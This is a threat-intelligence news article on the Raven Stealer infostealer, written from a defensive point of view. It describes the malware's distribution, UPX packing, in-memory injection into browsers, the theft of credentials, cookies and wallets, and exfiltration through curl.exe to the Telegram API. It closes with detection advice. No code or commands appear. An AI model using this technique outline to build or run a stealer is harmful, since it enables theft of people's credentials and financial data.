Raven Stealer Unmasked: New MaaS Infostealer Plunders Data via Reflective Process Hollowing & Telegram Exfil
Amid a surge in malicious campaigns exploiting legitimate communication channels to evade traditional security measures, a new tool has drawn the attention of cybersecurity professionals—Raven Stealer. Emerging in July 2025, this information-stealing program has rapidly propagated via Telegram and GitHub, capturing interest not only for its capabilities but also for its blend of stealth, ease of use, and efficient data exfiltration methods.
Raven is currently a topic of intense discussion among threat analysts, as it illustrates how basic techniques can bypass antivirus solutions and browser-integrated protections with alarming efficiency.
Developed in Delphi and C++, Raven Stealer targets Windows systems. It harvests login credentials, payment information, and autocomplete data from Chromium-based browsers, including Chrome and Edge. Distributed via the Telegram channel “ZeroTrace” under the guise of an “educational tool,” the malware enables even inexperienced users to launch data theft using a built-in builder. Telegram also functions as the exfiltration channel, eliminating the need for a traditional command-and-control (C2) server.
The builds are compressed using UPX to hinder analysis and evade detection. Upon execution, the malware injects an encrypted module into browser processes using system calls like NtWriteVirtualMemory, allowing it to bypass the file system. Credentials, cookies, and payment data are extracted directly from memory, circumventing App-Bound Encryption protections.
Beyond browser data, Raven scans the system for cryptocurrency wallets, VPN clients, and installed games. All stolen information is archived into a ZIP file bearing the username, then exfiltrated via curl.exe using the Telegram API. This includes screenshots and text files containing sensitive data.
The techniques employed in Raven align with multiple MITRE ATT&CK tactics: obfuscation, hidden windows, directory reconnaissance, and leveraging Telegram as a command channel. This architecture makes the tool both potent and discreet.
The ZeroTrace team has maintained the project since late April 2025, regularly publishing updates and source code via GitHub and Telegram. Raven is already being compared to their previous creation, Octalyn Stealer—suggesting a deliberate strategy of distributing lightweight yet highly effective infostealers.
As a defensive response, experts recommend monitoring for UPX-packed binaries, unusual browser launch flags, suspicious curl executions, and connections to the Telegram API. Behavioral analysis and system call monitoring should also be implemented to detect such threats.
Raven Stealer stands as a stark reminder of how effortlessly technology can be weaponized. Beneath the guise of an “educational utility” lies a predatory instrument—one that does not educate, but corrodes—lowering the barrier to cybercrime and blurring the line between development and complicity.
